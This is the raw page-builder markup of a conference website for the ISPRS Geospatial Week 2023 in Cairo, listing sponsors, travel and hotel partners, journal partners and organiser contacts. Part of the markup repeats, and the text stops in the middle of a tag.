wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" 